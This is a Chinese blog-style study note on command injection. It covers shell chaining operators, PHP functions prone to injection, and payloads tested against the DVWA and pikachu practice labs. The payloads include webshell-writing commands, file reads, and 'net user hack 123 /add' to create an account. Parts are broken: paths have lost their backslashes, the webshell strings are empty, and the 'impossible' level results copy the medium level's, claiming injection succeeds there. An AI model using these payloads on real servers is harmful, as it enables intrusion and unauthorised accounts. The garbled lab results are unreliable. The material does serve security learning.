命令执行

命令执行

基础知识

Window

“|” 管道符,前面命令标准输出,后面命令的标准输入
“&” commandA & commandB 先运行命令A然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B

Linux

“|” 管道符,前面命令标准输出,后面命令的标准输入
“&” commandA & commandB 先运行命令A然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B
“;” commandA;commandB执行完A执行B
“%0a” 换行符
“%0d” 回车符

注入函数

php

eval(),assert(), system(),preg_replace(), create_function, call_user_func, call_user_func_array,array_map(),反引号,ob_start(),exec(),shell_exec(),passthru(),escapeshellcmd(),popen(),proc_open(),pcntl_exec()

漏洞利用

命令注入漏洞,攻击者直接继承web用户权限,可以在服务器上执行任意命令,危害特别大。以下是几种常见的利用方式,但利用方式不止这些,我们可以进行任何shell可以执行的操作。

  • 直接获取webshell

    例如可以写入一句话木马: ?cmd=echo "" > D:phpstudyWWWwebshell.php

  • 显示当前路径

    例如可以提交参数 ?cmd=cd 来查看当前路径。

  • 读文件

    例如:?cmd=type c:windowssystem32driversetchosts,来查看系统hosts文件。

  • 写文件

    例如可以提交参数 ?cmd=echo "" > D:softwareshell.php

image-20210127202221951

实验

DVWA

low级别:

image-20210127203130066

- 127.0.0.1|whoami # 注入命令成功
- 127.0.0.1&whoami # 注入命令成功
- 127.0.0.1&&whoami # 注入命令成功
- 127.0.0.1||whoami # 注入命令成功

medium级别:

image-20210127203221930

- 127.0.0.1|whoami # 注入命令成功
- 127.0.0.1&whoami # 注入命令成功
- 127.0.0.1&&whoami # 注入命令不成功,查看源码发现&&被过滤。
- 127.0.0.1||whoami # 注入命令成功
- 127.0.0.1&;&ipconfig # 注入命令成功

high级别:

image-20210127203244351

- 127.0.0.1|whoami # 注入命令成功,因为源码过滤的是'| '(竖线+空格),故我们不在竖线后加空格就可绕开过滤。
- 127.0.0.1&whoami # 注入命令不成功
- 127.0.0.1&&whoami # 注入命令不成功
- 127.0.0.1||whoami # 注入命令不成功

impossible级别:

image-20210127203307496

- 127.0.0.1|whoami # 注入命令成功
- 127.0.0.1&whoami # 注入命令成功
- 127.0.0.1&&whoami # 注入命令不成功,查看源码发现&&被过滤。
- 127.0.0.1||whoami # 注入命令成功

pikachu

ping

image-20210127203024540

127.0.0.1 | dir
127.0.0.1 & dir
127.0.0.1 || dir
127.0.0.1 && dir
127.0.0.1 & ipconfig
127.0.0.1 | net user hack 123 /add #添加用户

exec

image-20210127203045731

phpinfo();
system("dir");
system("ipconfig");
system("whoami");
原文地址:https://www.cnblogs.com/liyu8/p/14336815.html